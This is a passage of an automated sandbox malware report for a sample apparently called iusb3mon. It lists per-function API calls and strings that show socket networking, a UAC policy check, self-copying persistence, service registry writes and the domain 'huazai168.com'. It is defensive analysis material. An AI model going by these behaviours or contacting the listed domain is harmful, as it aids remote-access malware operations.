GetLastError.KERNEL32(00000000), ref: 06298B9D
WaitForSingleObject.KERNEL32(?,0000000A,?,?,?,?,?,00000010), ref: 06298C38
GetLastError.KERNEL32(?,?,?,?,?,00000010), ref: 06298CA2
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,00000010), ref: 06298CD3

Strings

select, xrefs: 06298B55
ws2_32.dll, xrefs: 06298B12
socket, xrefs: 06298B23
recv, xrefs: 06298B2E
connect, xrefs: 06298B3B
getsockname, xrefs: 06298B48

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLastLibrary$FreeLoadObjectSingleWait
String ID: connect$getsockname$recv$select$socket$ws2_32.dll
API String ID: 1315272698-1466708075
Opcode ID: debfe400c55f082bc3a96079fa8dc95028a49f904c0f088a2562c44f1da330b3
Instruction ID: 96505f2ddfc9e426bb1f91ad0c651d5b770fee981e37f70bdccb3ae121f1fe9f
Opcode Fuzzy Hash: debfe400c55f082bc3a96079fa8dc95028a49f904c0f088a2562c44f1da330b3
Instruction Fuzzy Hash: B361AB71D10218EFDF609FA0DC88ADEBBB9EF45310F044556F905E6290D7B49A85CFA0

Function 062AADCD Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 174windowCOMMON

Download Yara Rule

APIs

Part of subcall function 062AB4CB: GetWindowLongA.USER32(?,000000F0), ref: 062AB4D7

GetParent.USER32(?), ref: 062AADF8
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 062AAE1B
GetWindowRect.USER32(?,?), ref: 062AAE34
GetWindowLongA.USER32(00000000,000000F0), ref: 062AAE47
CopyRect.USER32(?,?), ref: 062AAE94
CopyRect.USER32(?,?), ref: 062AAE9E
GetWindowRect.USER32(00000000,?), ref: 062AAEA7
CopyRect.USER32(?,?), ref: 062AAEC3

Strings

@, xrefs: 062AAE36
(, xrefs: 062AAE5F

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: ($@
API String ID: 808654186-1311469180
Opcode ID: 71da6760b9dcd230f12cf2643c4ecfc1bc38c41be94159294e0d0e3966f18556
Instruction ID: 9b2d8b400acd820c4e6241d32ecdae409e25ae79aa4754524da1f55820e5c24d
Opcode Fuzzy Hash: 71da6760b9dcd230f12cf2643c4ecfc1bc38c41be94159294e0d0e3966f18556
Instruction Fuzzy Hash: 65515371D10319AFDB54DBA8DD88EEEBBB9AF44710F054565ED11F3180D6B0E905CB60

Function 06295AA1 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 138registrystringprocessCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,00000000,?,?,?,00000000,00000000), ref: 06295AEA
RegQueryValueA.ADVAPI32(00000000,00000000,?,06295CD7), ref: 06295B09
RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,00000000), ref: 06295B14
wsprintfA.USER32 ref: 06295B3C
RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,00000000), ref: 06295B5C
RegQueryValueA.ADVAPI32(00000000,00000000,?,06295CD7), ref: 06295B93
RegCloseKey.ADVAPI32(00000000), ref: 06295B98
lstrcatA.KERNEL32(?,062B7D6C), ref: 06295BDA
lstrcatA.KERNEL32(?,06295CD7), ref: 06295BE6
lstrcpyA.KERNEL32(00000000,06295CD7), ref: 06295BEE
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 06295C27

Strings

WinSta0\Default, xrefs: 06295C0A
%s\shell\open\command, xrefs: 06295B36
"%1, xrefs: 06295BA0
D, xrefs: 06295C01

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValuelstrcat$CreateProcesslstrcpywsprintf
String ID: "%1$%s\shell\open\command$D$WinSta0\Default
API String ID: 1351118359-33419044
Opcode ID: 96567842c0092e43002f741d5af8caa1ab901f89c0479e2c541252ed7161398d
Instruction ID: 736ad90a74432dfc144753619305b13f9aeb29aada667ba24c92db8de6effb78
Opcode Fuzzy Hash: 96567842c0092e43002f741d5af8caa1ab901f89c0479e2c541252ed7161398d
Instruction Fuzzy Hash: 04414E7291021DBBDF529BA0DC49EEFBB7DEB88750F1400A5FA05E2040E6719B85DFA0

Function 06297715 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 125stringmemoryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,00000000,?,00000000), ref: 06297748
GetCurrentProcess.KERNEL32(00000008,?), ref: 06297779
OpenProcessToken.ADVAPI32(00000000), ref: 06297780
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 062977A2
GetLastError.KERNEL32 ref: 062977A8
LocalAlloc.KERNEL32(00000040,?), ref: 062977B8
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 062977D1
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 062977D9
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 062977E6
LocalFree.KERNEL32(00000000), ref: 062977EF
CloseHandle.KERNEL32(?), ref: 062977FA
lstrcpyA.KERNEL32(?,062BE16C), ref: 06297848
lstrcatA.KERNEL32(?,062BE154), ref: 06297892

Strings

PromptOnSecureDesktop, xrefs: 06297859
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 0629785E

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Token$AuthorityInformationLocalProcess$AllocCloseCountCurrentErrorFreeHandleLastOpenVersionlstrcatlstrcpy
String ID: PromptOnSecureDesktop$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 209792486-2497808001
Opcode ID: 4e80665fa7715eb0b021a2cbe061a4cab7df2798d75268996c8125dafd98697e
Instruction ID: 556f8417cfd76dd4ea3105df084946ffd20e237aefc1a1cd666953beb86bcc09
Opcode Fuzzy Hash: 4e80665fa7715eb0b021a2cbe061a4cab7df2798d75268996c8125dafd98697e
Instruction Fuzzy Hash: C1415B70D3030AFFEFA55B60EC89EEE7B79FB85780F150062EE45A1140D6B18A41EE61

Function 062971D0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 120libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Ole32.dll,00000000,?,00000000), ref: 062971E4
GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 062971F4
GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 062971FF
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 0629720A
LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,?,?,?,?,06297A46), ref: 06297214
GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 0629721F
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,06297A46), ref: 062972E1
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,06297A46), ref: 062972EB

Strings

SysFreeString, xrefs: 06297216
CoUninitialize, xrefs: 062971F6
CoInitialize, xrefs: 062971EE
Ole32.dll, xrefs: 062971DF
CoCreateInstance, xrefs: 06297201
Oleaut32.dll, xrefs: 0629720C
FriendlyName, xrefs: 062972AA

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID: CoCreateInstance$CoInitialize$CoUninitialize$FriendlyName$Ole32.dll$Oleaut32.dll$SysFreeString
API String ID: 2256533930-3340630095
Opcode ID: 6f6bfe8dc8fcb4f72b7f36a364c38ae009ab199be0ddd5eb353de7b0526f6480
Instruction ID: 40cb50da6d462214a3e088fa0c65cd73f586838eb8cb77763d3c3281792d7ce4
Opcode Fuzzy Hash: 6f6bfe8dc8fcb4f72b7f36a364c38ae009ab199be0ddd5eb353de7b0526f6480
Instruction Fuzzy Hash: BF413D70E2021AAFCB50DBA5CC88DEFBBB9EF84744B114459F905F7210DAB19901CBA0

Function 06298DF3 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,00000000,00000000,00000000), ref: 06298E24
GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 06298E37
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 06298E42
GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 06298E4D
GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 06298E5B
LoadLibraryA.KERNEL32(kernel32.dll), ref: 06298E65
GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 06298E70

Strings

kernel32.dll, xrefs: 06298E60
SetThreadDesktop, xrefs: 06298E47
CloseDesktop, xrefs: 06298E55
user32.dll, xrefs: 06298E19
GetCurrentThreadId, xrefs: 06298E6A
tDesktop, xrefs: 06298E98
GetThreadDesktop, xrefs: 06298E2B
GetUserObjectInformationA, xrefs: 06298E3C

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$tDesktop$user32.dll
API String ID: 2238633743-1569342589
Opcode ID: 03c3d8d6b421873b3e4992cd7b8821a80ccf95d3576ddcc2687e1c18a815cabe
Instruction ID: b36831bca63c71cfb61703cf7734bb76181a99023819fd9005f5d5550340447d
Opcode Fuzzy Hash: 03c3d8d6b421873b3e4992cd7b8821a80ccf95d3576ddcc2687e1c18a815cabe
Instruction Fuzzy Hash: 38213E71D50318BFDB509FA5DC85EDDBAB8EF48790F014526F951F2250E7B499008F64

Function 062A3DFB Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(USER32,?,?,?,062A3F34), ref: 062A3E1D
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 062A3E35
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 062A3E46
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 062A3E57
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 062A3E68
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 062A3E79
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 062A3E8A

Strings

GetSystemMetrics, xrefs: 062A3E2F
MonitorFromRect, xrefs: 062A3E51
EnumDisplayMonitors, xrefs: 062A3E73
USER32, xrefs: 062A3E18
MonitorFromWindow, xrefs: 062A3E40
MonitorFromPoint, xrefs: 062A3E62
GetMonitorInfoA, xrefs: 062A3E84

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2376520503
Opcode ID: ed341f0cff40fc3295c5e5af2c7ead94c15fe54d536a041ea76f682dd776296e
Instruction ID: 13613f66e82d557c1481837c8d0005aeaf46e9da4d0f1168f7418b544a124dc3
Opcode Fuzzy Hash: ed341f0cff40fc3295c5e5af2c7ead94c15fe54d536a041ea76f682dd776296e
Instruction Fuzzy Hash: 61114570D60B919BC3919F25BDEC42AFEAAB788761350453FDA08D2900C7FC8442CF62

Function 0629789D Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 145stringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 062978C0
lstrlenA.KERNEL32(?,00000000), ref: 062978E2

Part of subcall function 062991B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06299216
Part of subcall function 062991B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0629922E
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0629923E
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0629924E
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0629925B
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06299268
Part of subcall function 062991B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062993F3

getsockname.WS2_32(?,?,00000001), ref: 06297944
GetVersionExA.KERNEL32(?), ref: 06297985
GetLastInputInfo.USER32(?), ref: 062979F3
GetTickCount.KERNEL32 ref: 062979F9
GlobalMemoryStatusEx.KERNEL32(?), ref: 06297A1E

Strings

RDP-Tcp, xrefs: 06297A69
11.26, xrefs: 06297A52
Groupfenzhu, xrefs: 062978F3
@, xrefs: 06297A16
Console, xrefs: 062978F8
SYSTEM\CurrentControlSet\Services\%s, xrefs: 062978B3

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$CountFreeGlobalInfoInputLastLoadMemoryStatusTickVersiongetsocknamelstrlenwsprintf
String ID: 11.26$@$Console$Groupfenzhu$RDP-Tcp$SYSTEM\CurrentControlSet\Services\%s
API String ID: 1372434316-3814532725
Opcode ID: 77862830cbd337d4ac3364bdc61ffbd7e393306922803d64b4bbf0d25fa318c1
Instruction ID: 68c201945a4d3fac4558b5eedf7fc8cca51d9e2a6d6f5a11d9714295bff0dd33
Opcode Fuzzy Hash: 77862830cbd337d4ac3364bdc61ffbd7e393306922803d64b4bbf0d25fa318c1
Instruction Fuzzy Hash: 76510FB1D20219ABDFA0EBA4DC49FDE77BCEB44710F004496AA19A6140DB749B85CF61

Function 0629898B Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 110libraryloadersleepCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ws2_32.dll), ref: 062989A5
GetProcAddress.KERNEL32(00000000,closesocket), ref: 062989B0
wsprintfA.USER32 ref: 062989E1
LoadLibraryA.KERNEL32(ws2_32.dll), ref: 06298A3E
GetProcAddress.KERNEL32(00000000,send), ref: 06298A46
GetLastError.KERNEL32 ref: 06298A6B
CloseHandle.KERNEL32(00000000), ref: 06298AAF
Sleep.KERNEL32(00000002), ref: 06298ABC
FreeLibrary.KERNEL32(00000000), ref: 06298AD4

Strings

ws2_32.dll, xrefs: 062989A0, 06298A39
ID= %d , xrefs: 062989DB
closesocket, xrefs: 062989A7
send, xrefs: 06298A40

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Library$AddressLoadProc$CloseErrorFreeHandleLastSleepwsprintf
String ID: ID= %d $closesocket$send$ws2_32.dll
API String ID: 872202526-2339802411
Opcode ID: 97f800e514db081c13820b3bcae8dc3ffc338259a533c7f0c51daf0f05d7cfad
Instruction ID: 4eda53705b25c16dcfc5186ef844d62d61300753ab8f15b98619537b0e38d6a1
Opcode Fuzzy Hash: 97f800e514db081c13820b3bcae8dc3ffc338259a533c7f0c51daf0f05d7cfad
Instruction Fuzzy Hash: 0341B331D10219EFDF50DFA0D849AEEBBB9FF45351F144815EE45A6180C7B4AA41CFA2

Function 062938D0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 93sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06293910
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06293921
wsprintfA.USER32 ref: 0629393F
wsprintfA.USER32 ref: 06293959
GetFileAttributesA.KERNEL32(?), ref: 06293965
wsprintfA.USER32 ref: 06293983
Sleep.KERNEL32(00000064), ref: 0629398A
CopyFileA.KERNEL32(?,?,00000000), ref: 0629399F
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 062939AF
CreateDirectoryA.KERNEL32(?,00000000), ref: 062939BD

Part of subcall function 06293777: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06293788
Part of subcall function 06293777: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 062937B8
Part of subcall function 06293777: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 062937D1
Part of subcall function 06293777: GetFileSize.KERNEL32(00000000,00000000), ref: 062937D9
Part of subcall function 06293777: _rand.LIBCMT ref: 0629381A
Part of subcall function 06293777: WriteFile.KERNEL32(?,?,00000400,?,00000000), ref: 0629384F
Part of subcall function 06293777: CloseHandle.KERNEL32(?), ref: 06293860

SetFileAttributesA.KERNEL32(?,00000000), ref: 062939DF

Strings

%s.exe, xrefs: 06293939
%s\%s, xrefs: 06293944, 06293957, 06293981

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$wsprintf$AttributesCreate$CloseCopyDirectoryFolderHandleLibraryLoadModuleMoveNamePathPointerSizeSleepSpecialWrite_rand
String ID: %s.exe$%s\%s
API String ID: 832629782-3574828809
Opcode ID: 0bd640e2368ce2cdf5ef17bceb17a3d6e4c46f149ca1aba1f7b7d403d3ac91ed
Instruction ID: 01981dba6ea07e42a0ad87ee0379f73dd7e3a0b8f3972d12cda05f34f7b77633
Opcode Fuzzy Hash: 0bd640e2368ce2cdf5ef17bceb17a3d6e4c46f149ca1aba1f7b7d403d3ac91ed
Instruction Fuzzy Hash: 3C312FB290021DABDB509AE0EC8CEEB77BDEB84315F040596FB45E6040EA749A85CF71

Function 06295643 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 81stringtimeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 06295660
strlen.MSVCRT ref: 06295685

Part of subcall function 06299423: LoadLibraryA.KERNEL32(ADVAPI32.dll,Console,80000001,062BCB7A,?,00000000,0629ADE0,062AE538,000000FF,?,062956BE,80000001,Console,Groupfenzhu,00000001,062BCB7A), ref: 06299450
Part of subcall function 06299423: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 06299467
Part of subcall function 06299423: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 06299472
Part of subcall function 06299423: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 0629947D
Part of subcall function 06299423: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 06299488
Part of subcall function 06299423: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 06299493
Part of subcall function 06299423: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 0629949E
Part of subcall function 06299423: FreeLibrary.KERNEL32(00000000,?,00000000,0629ADE0,062AE538,000000FF,?,062956BE,80000001,Console,Groupfenzhu,00000001), ref: 06299592

strlen.MSVCRT ref: 062956A7
GetLocalTime.KERNEL32(?), ref: 062956C5
wsprintfA.USER32 ref: 062956ED
strlen.MSVCRT ref: 062956FC

Strings

InstallTime, xrefs: 0629570A
Remarkbeizhu, xrefs: 06295690
%4d-%.2d-%.2d %.2d:%.2d, xrefs: 062956E7
Groupfenzhu, xrefs: 062956B2
huazai168.com, xrefs: 0629564E
Console, xrefs: 06295674, 06295695, 062956B7, 0629570F
SYSTEM\CurrentControlSet\Services\%s, xrefs: 0629565A

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$strlen$Librarywsprintf$FreeLoadLocalTime
String ID: %4d-%.2d-%.2d %.2d:%.2d$Console$Groupfenzhu$InstallTime$Remarkbeizhu$SYSTEM\CurrentControlSet\Services\%s$huazai168.com
API String ID: 124699875-2856019323
Opcode ID: c36ef9bec1d2b997b5ecc99a6c9d3ca05047f7742c3d39e14013fd82d8f46ae2
Instruction ID: 3cd43434ba73c0befcb1f490bb6ab9ba86f45e0fc8802d91841d04e2214d3cc4
Opcode Fuzzy Hash: c36ef9bec1d2b997b5ecc99a6c9d3ca05047f7742c3d39e14013fd82d8f46ae2
Instruction Fuzzy Hash: CA21A5B2A603147BDB90A7A5AC8AEFF767DEB44B51F041415BE01E1081E6B9D980CB71

Function 062912D2 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 55networkCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 062912D7
WSAStartup.WS2_32(00000202,?), ref: 06291328
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 06291333

Strings

g, xrefs: 0629134D
, xrefs: 0629136D
8, xrefs: 06291351
x, xrefs: 06291369
q, xrefs: 06291361
h, xrefs: 06291365
m, xrefs: 06291355
k, xrefs: 06291359
y, xrefs: 0629135D

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CreateEventH_prologStartup
String ID: $8$g$h$k$m$q$x$y
API String ID: 2400729181-2346024814
Opcode ID: 22f98863f71fdb68262b79866e628cf080b7289bc73c8a986c7a61034ed2b0c0
Instruction ID: a61d0f0f3bcf7d57941ef2cd2e3eeb591bb45bf5dacb05c2fac1e782db84d606
Opcode Fuzzy Hash: 22f98863f71fdb68262b79866e628cf080b7289bc73c8a986c7a61034ed2b0c0
Instruction Fuzzy Hash: E721C3309043C5CEEB51DBA8C9497EFBFF89F15348F04045E9992A3682DBB55618CBB2

Function 062990D0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60libraryloaderstringCOMMON

Download Yara Rule

APIs

